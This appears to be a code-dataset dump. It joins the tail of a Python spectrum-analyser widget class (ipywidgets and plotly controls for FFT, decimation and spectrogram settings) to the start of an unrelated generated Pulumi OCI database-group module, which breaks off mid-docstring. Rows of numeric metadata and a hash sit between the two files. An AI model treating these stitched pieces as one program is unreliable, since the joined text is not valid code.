        self._widgets.update({'ddc_centre_frequency' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_centre_frequency'],
                                        min_value=0,
                                        max_value=self.analyser._block.BlockStatus['SamplingFreq']*1e3,
                                        step=1,
                                        dict_id='ddc_centre_frequency',
                                        description='Centre Frequency (MHz):')})
        self._widgets.update({'ddc_plan_hd2_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_hd2_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_hd2_db',
                                        description='HD2 (dB)')})
        self._widgets.update({'ddc_plan_hd3_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_hd3_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_hd3_db',
                                        description='HD3 (dB)')})
        self._widgets.update({'ddc_plan_nsd_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_nsd_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_nsd_db',
                                        description='NSD (dBFs/Hz)')})
        self._widgets.update({'ddc_plan_pll_mix_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_pll_mix_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_pll_mix_db',
                                        description='PLL Ref Mixing (dB)')})
        self._widgets.update({'ddc_plan_off_spur_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_off_spur_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_off_spur_db',
                                        description='Offset Spur (dB)')})
        self._widgets.update({'ddc_plan_tis_spur_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_tis_spur_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_tis_spur_db',
                                        description='TI Spur (dB)')})
        # One checkbox per frequency-planner overlay toggle.
        for idx, freq_prop in enumerate(_freq_planner_props):
            self._widgets.update({freq_prop :
                                  CheckBox(callback=self._update_config,
                                           description=_freq_planner_desc[idx],
                                           value=self._config[freq_prop],
                                           indent=False,
                                           layout_width='150px',
                                           dict_id=freq_prop)})
        self._widgets.update({'decimation_factor' :
                              DropDown(callback=self._update_config,
                                       options=[2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048],
                                       value=self._config['decimation_factor'],
                                       dict_id='decimation_factor',
                                       description='Decimation Factor:')})
        self._widgets.update({'spectrum_type' :
                              DropDown(callback=self._update_config,
                                       options=[('Power Spectrum'),
                                                ('Power Spectral Density')],
                                       value=self._config['spectrum_type'],
                                       dict_id='spectrum_type',
                                       description='Spectrum Type:',
                                       description_width='100px')})
        self._widgets.update({'spectrum_units' :
                              DropDown(callback=self._update_config,
                                       options=[('dBW'),
                                                ('dBm')],
                                       value=self._config['spectrum_units'],
                                       dict_id='spectrum_units',
                                       description='Spectrum Units:',
                                       description_width='100px')})
        self._widgets.update({'post_process' :
                              DropDown(callback=self._update_config,
                                       options=[('None', 'none'),
                                                ('Maximum Hold', 'max'),
                                                ('Minimum Hold', 'min'),
                                                ('Running Average', 'average'),
                                                ('Running Median', 'median')],
                                       value=self._config['post_process'],
                                       dict_id='post_process',
                                       description='Post Processing:',
                                       description_width='100px')})
        self._widgets.update({'fftsize' :
                              DropDown(callback=self._update_config,
                                       options=[64, 128, 256, 512, 1024, 2048, 4096, 8192],
                                       value=4096,
                                       dict_id='fftsize',
                                       description='FFT Size:')})
        self._widgets.update({'calibration_mode' :
                              DropDown(callback=self._update_config,
                                       options=[('1 (Fs/2 ≤ ±30%)', 1),
                                                ('2 (Fs/2 > ±30%)', 2)],
                                       value=self._config['calibration_mode'],
                                       dict_id='calibration_mode',
                                       description='Calibration Mode:')})
        self._widgets.update({'window' :
                              DropDown(callback=self._update_config,
                                       options=[('Rectangular', 'rectangular'),
                                                ('Bartlett', 'bartlett'),
                                                ('Blackman', 'blackman'),
                                                ('Hamming', 'hamming'),
                                                ('Hanning', 'hanning')],
                                       value='rectangular',
                                       dict_id='window',
                                       description='')})
        self._widgets.update({'plotly_theme' :
                              DropDown(callback=self._update_config,
                                       options=[('Seaborn', 'seaborn'),
                                                ('Simple White', 'simple_white'),
                                                ('Plotly', 'plotly'),
                                                ('Plotly White', 'plotly_white'),
                                                ('Plotly Dark', 'plotly_dark')],
                                       value='plotly',
                                       dict_id='plotly_theme',
                                       description='Plotly Theme:')})
        self._widgets.update({'colour_map' :
                              DropDown(callback=self._update_config,
                                       options=[('Grey' , 'gray'),
                                                ('Spring' , 'spring'),
                                                ('Summer' , 'summer'),
                                                ('Autumn' , 'autumn'),
                                                ('Winter' , 'winter'),
                                                ('Cool' , 'cool'),
                                                ('Hot' , 'hot'),
                                                ('Copper' , 'copper'),
                                                ('Rainbow', 'rainbow'),
                                                ('Jet' , 'jet')],
                                       value='gray',
                                       dict_id='colour_map',
                                       description='Colour Map:',
                                       description_width='100px')})
        self._widgets.update({'line_colour' :
                              DropDown(callback=self._update_config,
                                       options=list(mcolors.CSS4_COLORS),
                                       value='white',
                                       dict_id='line_colour',
                                       description='Line Colour:')})
        self._widgets.update({'line_fill' :
                              DropDown(callback=self._update_config,
                                       options=list(mcolors.CSS4_COLORS),
                                       value='lightpink',
                                       dict_id='line_fill',
                                       description='Line Fill:')})
        self._widgets.update({'spectrogram_performance' :
                              DropDown(callback=self._update_config,
                                       options=[('Low', 8),
                                                ('Medium', 4),
                                                ('High', 2)],
                                       value=2,
                                       dict_id='spectrogram_performance',
                                       description='Resolution:',
                                       description_width='100px')})
        self._widgets.update({'number_max_indices' :
                              IntText(callback=self._update_config,
                                      value=self._config['number_max_indices'],
                                      min_value=1,
                                      max_value=64,
                                      step=1,
                                      dict_id='number_max_indices',
                                      description='Number of Maximums:')})
        self._widgets.update({'number_min_indices' :
                              IntText(callback=self._update_config,
                                      value=self._config['number_min_indices'],
                                      min_value=1,
                                      max_value=64,
                                      step=1,
                                      dict_id='number_min_indices',
                                      description='Number of Minimums:')})
        self._widgets.update({'number_frames' :
                              FloatText(callback=self._update_config,
                                        value=self._config['number_frames'],
                                        min_value=1,
                                        max_value=64,
                                        step=1,
                                        dict_id='number_frames',
                                        description='Number Frames:',
                                        description_width='100px')})
        self._widgets.update({'ymin' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ymin'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ymin',
                                        description='Y-Low (dB):',
                                        description_width='100px')})
        self._widgets.update({'ymax' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ymax'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ymax',
                                        description='Y-High (dB):',
                                        description_width='100px')})
        self._widgets.update({'centre_frequency' :
                              FloatText(callback=self._update_config,
                                        value=self._config['centre_frequency'],
                                        min_value=0,
                                        max_value=self.analyser._block.BlockStatus['SamplingFreq']*1e3,
                                        step=1,
                                        dict_id='centre_frequency',
                                        description='Centre Frequency (MHz):')})
        self._widgets.update({'nyquist_stopband' :
                              FloatText(callback=self._update_config,
                                        value=self._config['nyquist_stopband'],
                                        min_value=50,
                                        max_value=100,
                                        step=1,
                                        dict_id='nyquist_stopband',
                                        description='Nyquist Stopband (%):')})
        self._widgets.update({'height' :
                              FloatText(callback=self._update_config,
                                        value=self._config['height'],
                                        min_value=200,
                                        max_value=2160,
                                        step=1,
                                        dict_id='height',
                                        description='Plot Height (Px):')})
        self._widgets.update({'width' :
                              FloatText(callback=self._update_config,
                                        value=self._config['width'],
                                        min_value=400,
                                        max_value=4096,
                                        step=1,
                                        dict_id='width',
                                        description='Plot Width (Px):')})
        #self._widgets.update({'update_frequency' :
        #                      FloatText(callback=self._update_config,
        #                                value=self._config['update_frequency'],
        #                                min_value=5,
        #                                max_value=12,
        #                                step=1,
        #                                dict_id='update_frequency',
        #                                description='Update Frequency:')})
        self._widgets.update({'update_frequency' :
                              DropDown(callback=self._update_config,
                                       options=[('Low', 5),
                                                ('Medium', 10),
                                                ('High', 15)],
                                       value=5,
                                       dict_id='update_frequency',
                                       description='Plot Performance:')})
        self._widgets.update({'zmin' :
                              FloatText(callback=self._update_config,
                                        value=self._config['zmin'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='zmin',
                                        description='Z-Low (dB):',
                                        description_width='100px')})
        self._widgets.update({'zmax' :
                              FloatText(callback=self._update_config,
                                        value=self._config['zmax'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='zmax',
                                        description='Z-High (dB):',
                                        description_width='100px')})
        self._widgets.update({'quality' :
                              FloatText(callback=self._update_config,
                                        value=self._config['quality'],
                                        min_value=80,
                                        max_value=100,
                                        step=1,
                                        dict_id='quality',
                                        description='Quality (%):',
                                        description_width='100px')})
        self._widgets.update({'dma_enable' :
                              Button(callback=self._update_config,
                                     description_on='On',
                                     description_off='Off',
                                     state=False,
                                     dict_id='dma_enable')})
        self._widgets.update({'spectrum_enable' :
                              Button(callback=self._update_config,
                                     description_on='On',
                                     description_off='Off',
                                     state=False,
                                     dict_id='spectrum_enable')})
        self._widgets.update({'waterfall_enable' :
                              Button(callback=self._update_config,
                                     description_on='On',
                                     description_off='Off',
                                     state=False,
                                     dict_id='waterfall_enable')})
        self._widgets.update({'sample_frequency_label' :
                              Label(value=str((self.analyser.sample_frequency/self.analyser.decimation_factor)*1e-6),
                                    svalue='Sample Frequency: ',
                                    evalue=' MHz',
                                    dict_id='sample_frequency_label')})
        self._widgets.update({'resolution_bandwidth_label' :
                              Label(value=str(((self.analyser.sample_frequency/self.analyser.decimation_factor)/ \
                                               self.analyser.fftsize)*1e-3),
                                    svalue='Frequency Resolution: ',
                                    evalue=' kHz',
                                    dict_id='resolution_bandwidth_label')})
        self._widgets.update({'display_max' :
                              CheckBox(callback=self._update_config,
                                       description='Display Maximum',
                                       value=self._config['display_max'],
                                       dict_id='display_max')})
        self._widgets.update({'display_min' :
                              CheckBox(callback=self._update_config,
                                       description='Display Minimum',
                                       value=self._config['display_min'],
                                       dict_id='display_min')})
        # Small preview plot of the current FFT window shape.
        self._window_plot = go.FigureWidget(layout={'hovermode' : 'closest',
                                                    'height' : 225,
                                                    'width' : 300,
                                                    'margin' : {
                                                        't':0, 'b':20, 'l':0, 'r':0
                                                    },
                                                    'showlegend' : False,
                                                    },
                                            data=[{
                                                'x': np.arange(self.analyser.fftsize),
                                                'y': np.ones(self.analyser.fftsize),
                                                'line':{
                                                    'color' : 'palevioletred',
                                                    'width' : 2
                                                },
                                                'fill' : 'tozeroy',
                                                'fillcolor' : 'rgba(128, 128, 128, 0.5)'
                                            }])
        self._accordions.update({'properties' :
                                 ipw.Accordion(children=[ipw.HBox(
                                     [ipw.VBox([ipw.Label(value='Spectrum Analyzer: ', layout=ipw.Layout(width='150px')),
                                                ipw.Label(value='Spectrogram: ', layout=ipw.Layout(width='150px'))]),
                                      ipw.VBox([self._widgets['spectrum_enable'].get_widget(),
                                                self._widgets['waterfall_enable'].get_widget()])],
                                     layout=ipw.Layout(justify_content='space-around')),
                                     ipw.VBox([self._widgets['centre_frequency'].get_widget(),
                                               self._widgets['decimation_factor'].get_widget(),
                                               self._widgets['fftsize'].get_widget()]),
                                     ipw.VBox([self._widgets['post_process'].get_widget(),
                                               self._widgets['number_frames'].get_widget(),
                                               self._widgets['spectrum_type'].get_widget(),
                                               self._widgets['spectrum_units'].get_widget(),
                                               self._widgets['ymin'].get_widget(),
                                               self._widgets['ymax'].get_widget()]),
                                     ipw.VBox([ipw.Label(value='Experimental Control Panel'),
                                               self._widgets['ddc_centre_frequency'].get_widget(),
                                               ipw.HBox([
                                                   ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(0, int(len(_freq_planner_props)/2))]),
                                                   ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(int(len(_freq_planner_props)/2), len(_freq_planner_props))])
                                               ])
                                               ]),
                                     ipw.VBox([self._widgets['spectrogram_performance'].get_widget(),
                                               self._widgets['colour_map'].get_widget(),
                                               self._widgets['zmin'].get_widget(),
                                               self._widgets['zmax'].get_widget()]),
                                     ipw.VBox([self._window_plot,
                                               self._widgets['window'].get_widget()]),
                                     ipw.VBox([self._widgets['nyquist_stopband'].get_widget(),
                                               self._widgets['height'].get_widget(),
                                               self._widgets['width'].get_widget(),
                                               self._widgets['update_frequency'].get_widget()])
                                     ])})
        # NOTE(review): stashed alternative frequency-planner layout kept by
        # the original author as a dead string literal; retained verbatim.
        """ Frequency Planner Widgets
        ipw.VBox([self._widgets['ddc_centre_frequency'].get_widget(),
                  self._widgets['ddc_plan_hd2_db'].get_widget(),
                  self._widgets['ddc_plan_hd3_db'].get_widget(),
                  self._widgets['ddc_plan_pll_mix_db'].get_widget(),
                  self._widgets['ddc_plan_off_spur_db'].get_widget(),
                  self._widgets['ddc_plan_tis_spur_db'].get_widget(),
                  self._widgets['ddc_plan_nsd_db'].get_widget(),
                  ipw.HBox([
                      ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(0,int(len(_freq_planner_props)/2))]),
                      ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(int(len(_freq_planner_props)/2),len(_freq_planner_props))])
                  ])
                  ]),
        """
        self._accordions['properties'].set_title(0, 'System')
        self._accordions['properties'].set_title(1, 'Receiver')
        self._accordions['properties'].set_title(2, 'Spectrum Analyzer')
        self._accordions['properties'].set_title(3, 'Frequency Planner')
        self._accordions['properties'].set_title(4, 'Spectrogram')
        self._accordions['properties'].set_title(5, 'Window Settings')
        self._accordions['properties'].set_title(6, 'Plot Settings')
        # Push the defaults through the normal update path so widgets,
        # analyser and config all agree.
        self._update_config(self._config)

    def _update_config(self, config_dict):
        """Validate *config_dict*, merge it into ``_config`` and queue a
        frontend update (run immediately if none is in progress)."""
        for key in config_dict.keys():
            if key not in self._config:
                raise KeyError(''.join(['Key ', str(key), ' not in dictionary.']))
        self._config.update(config_dict)
        self._update_que.append(config_dict.keys())
        if not self._running_update:
            self._running_update = True
            self._update_frontend()

    def _update_frontend(self):
        """Drain the update queue, applying each changed key to the
        analyser and its widget. The spectrum plot is paused while
        updates are applied and restored afterwards."""
        if self._update_que:
            plot_running = self._config['spectrum_enable']
            self.analyser.spectrum_enable = False
            # NOTE(review): 32 is presumably the DMA idle status — confirm.
            while self.analyser.dma_status != 32:
                time.sleep(0.1)
            while self._running_update:
                keys = self._update_que.pop(0)
                for key in keys:
                    if key in self._config:
                        # These keys invalidate the waterfall; switch it off.
                        if key in ['centre_frequency', 'decimation_factor', 'quality']:
                            self._widgets['waterfall_enable'].value = False
                            self.analyser.waterfall_enable = False
                        setattr(self.analyser, key, self._config[key])
                        self._widgets[key].value = self._config[key]
                        if key in ['plotly_theme', 'line_colour', 'decimation_factor',
                                   'spectrum_enable', 'waterfall_enable']:
                            self._update_widgets(key)
                        if key in ['fftsize', 'window']:
                            self._update_figurewidgets(key)
                self._update_textwidgets()
                time.sleep(0.2)
                if not self._update_que:
                    self.analyser.spectrum_enable = plot_running
                    self._running_update = False
        self._running_update = False

    def _update_textwidgets(self):
        """Refresh the sample-frequency (MHz) and resolution (kHz) labels."""
        self._widgets['sample_frequency_label'].value = str((self.analyser.sample_frequency/ \
                                                             self.analyser.decimation_factor)*1e-6)
        self._widgets['resolution_bandwidth_label'].value = str(((self.analyser.sample_frequency/ \
                                                                  self.analyser.decimation_factor)/self.analyser.fftsize)*1e-3)

    def _update_figurewidgets(self, key):
        """Refresh the window preview plot after an fftsize/window change."""
        if key in ['fftsize']:
            self._window_plot.data[0].x = np.arange(self.analyser.fftsize)
            self._window_plot.data[0].y = self.analyser.spectrum_window
        elif key in ['window']:
            self._window_plot.data[0].y = self.analyser.spectrum_window

    def _update_widgets(self, key):
        """Apply side effects of *key* to related widgets (colours, step
        size, and the shared DMA enable button state)."""
        if key in ['line_colour']:
            self._window_plot.data[0].line.color = self._config['line_colour']
            self._widgets['dma_enable'].button_colour = self._config['line_colour']
            self._widgets['spectrum_enable'].button_colour = self._config['line_colour']
            self._widgets['waterfall_enable'].button_colour = self._config['line_colour']
        elif key in ['plotly_theme']:
            self._window_plot.layout.template = self._config['plotly_theme']
        elif key in ['decimation_factor']:
            # Finer frequency steps at higher decimation.
            step_list = [10, 1, 1, 1, 0.1, 0.1, 0.1, 0.01, 0.01, 0.01, 0.001]
            self._widgets['centre_frequency'].step = step_list[int(np.log2(self._config['decimation_factor']) - 1)]
        elif key in ['spectrum_enable']:
            # DMA stays on while either display is enabled.
            if self._config['spectrum_enable']:
                self._widgets['dma_enable'].configure_state(True)
            else:
                if not self._config['waterfall_enable']:
                    self._widgets['dma_enable'].configure_state(False)
        elif key in ['waterfall_enable']:
            if self._config['waterfall_enable']:
                self._widgets['dma_enable'].configure_state(True)
            else:
                if not self._config['spectrum_enable']:
                    self._widgets['dma_enable'].configure_state(False)

    def spectrum_analyser(self, config=None):
        """Return the assembled spectrum-analyser layout, optionally
        applying *config* first."""
        if config is not None:
            self.config = config
        return ipw.VBox([ipw.HBox([ipw.VBox([self.analyser.spectrum(),
                                             self.analyser.waterfall(),
                                             ipw.HBox([self._widgets['sample_frequency_label'].get_widget(),
                                                       ipw.Label(value=' | '),
                                                       self._widgets['resolution_bandwidth_label'].get_widget()],
                                                      layout=ipw.Layout(justify_content='flex-end'))
                                             ]),
                                   self._accordions['properties']
                                   ])
                         ])
| 48.322751
| 199
| 0.459807
| 9,086
| 109,596
| 5.191503
| 0.039842
| 0.076998
| 0.090736
| 0.05088
| 0.968327
| 0.963706
| 0.960611
| 0.960611
| 0.959805
| 0.956583
| 0
| 0.015685
| 0.453767
| 109,596
| 2,268
| 200
| 48.322751
| 0.772154
| 0.019928
| 0
| 0.953463
| 0
| 0
| 0.098522
| 0.007504
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108225
| false
| 0
| 0.004329
| 0.04816
| 0.16829
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43e529ebbf87fb8335c2af1dc2416a93a566acfd
| 22,179
|
py
|
Python
|
sdk/python/pulumi_oci/databasemanagement/managed_database_group.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/databasemanagement/managed_database_group.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/databasemanagement/managed_database_group.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ManagedDatabaseGroupArgs', 'ManagedDatabaseGroup']
@pulumi.input_type
class ManagedDatabaseGroupArgs:
    # Generated by the Pulumi Terraform Bridge (tfgen) — see file header;
    # regenerate rather than editing by hand.
    def __init__(__self__, *,
                 compartment_id: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a ManagedDatabaseGroup resource.
        :param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
        :param pulumi.Input[str] description: (Updatable) The information specified by the user about the Managed Database Group.
        :param pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]] managed_databases: (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
        :param pulumi.Input[str] name: The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
        """
        pulumi.set(__self__, "compartment_id", compartment_id)
        # Optional arguments are only stored when provided, so unset values
        # stay absent from the resource's input map.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if managed_databases is not None:
            pulumi.set(__self__, "managed_databases", managed_databases)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> pulumi.Input[str]:
        """
        (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
        """
        return pulumi.get(self, "compartment_id")

    @compartment_id.setter
    def compartment_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "compartment_id", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The information specified by the user about the Managed Database Group.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="managedDatabases")
    def managed_databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]]:
        """
        (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
        """
        return pulumi.get(self, "managed_databases")

    @managed_databases.setter
    def managed_databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]]):
        pulumi.set(self, "managed_databases", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class _ManagedDatabaseGroupState:
    def __init__(__self__, *,
                 compartment_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 state: Optional[pulumi.Input[str]] = None,
                 time_created: Optional[pulumi.Input[str]] = None,
                 time_updated: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering ManagedDatabaseGroup resources.
        :param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
        :param pulumi.Input[str] description: (Updatable) The information specified by the user about the Managed Database Group.
        :param pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]] managed_databases: (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
        :param pulumi.Input[str] name: The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
        :param pulumi.Input[str] state: The current lifecycle state of the Managed Database Group.
        :param pulumi.Input[str] time_created: The date and time the Managed Database Group was created.
        :param pulumi.Input[str] time_updated: The date and time the Managed Database Group was last updated.
        """
        # Every state field is optional; persist only those actually given.
        for key, value in (
                ("compartment_id", compartment_id),
                ("description", description),
                ("managed_databases", managed_databases),
                ("name", name),
                ("state", state),
                ("time_created", time_created),
                ("time_updated", time_updated)):
            if value is not None:
                pulumi.set(__self__, key, value)

    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
        """
        return pulumi.get(self, "compartment_id")

    @compartment_id.setter
    def compartment_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "compartment_id", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The information specified by the user about the Managed Database Group.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="managedDatabases")
    def managed_databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]]:
        """
        (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
        """
        return pulumi.get(self, "managed_databases")

    @managed_databases.setter
    def managed_databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]]):
        pulumi.set(self, "managed_databases", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[str]]:
        """
        The current lifecycle state of the Managed Database Group.
        """
        return pulumi.get(self, "state")

    @state.setter
    def state(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "state", value)

    @property
    @pulumi.getter(name="timeCreated")
    def time_created(self) -> Optional[pulumi.Input[str]]:
        """
        The date and time the Managed Database Group was created.
        """
        return pulumi.get(self, "time_created")

    @time_created.setter
    def time_created(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_created", value)

    @property
    @pulumi.getter(name="timeUpdated")
    def time_updated(self) -> Optional[pulumi.Input[str]]:
        """
        The date and time the Managed Database Group was last updated.
        """
        return pulumi.get(self, "time_updated")

    @time_updated.setter
    def time_updated(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_updated", value)
class ManagedDatabaseGroup(pulumi.CustomResource):
    # NOTE: generated resource wrapper. __init__ has two overloads (kwargs
    # form and an Args-object form); both funnel into _internal_init below.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 compartment_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        This resource provides the Managed Database Group resource in Oracle Cloud Infrastructure Database Management service.
        Creates a Managed Database Group. The group does not contain any
        Managed Databases when it is created, and they must be added later.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_oci as oci
        test_managed_database_group = oci.databasemanagement.ManagedDatabaseGroup("testManagedDatabaseGroup",
            compartment_id=var["compartment_id"],
            description=var["managed_database_group_description"],
            managed_databases=[oci.databasemanagement.ManagedDatabaseGroupManagedDatabaseArgs(
                id=var["managed_database_id"],
            )])
        ```
        ## Import
        ManagedDatabaseGroups can be imported using the `id`, e.g.
        ```sh
        $ pulumi import oci:databasemanagement/managedDatabaseGroup:ManagedDatabaseGroup test_managed_database_group "id"
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
        :param pulumi.Input[str] description: (Updatable) The information specified by the user about the Managed Database Group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]] managed_databases: (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
        :param pulumi.Input[str] name: The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ManagedDatabaseGroupArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        This resource provides the Managed Database Group resource in Oracle Cloud Infrastructure Database Management service.
        Creates a Managed Database Group. The group does not contain any
        Managed Databases when it is created, and they must be added later.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_oci as oci
        test_managed_database_group = oci.databasemanagement.ManagedDatabaseGroup("testManagedDatabaseGroup",
            compartment_id=var["compartment_id"],
            description=var["managed_database_group_description"],
            managed_databases=[oci.databasemanagement.ManagedDatabaseGroupManagedDatabaseArgs(
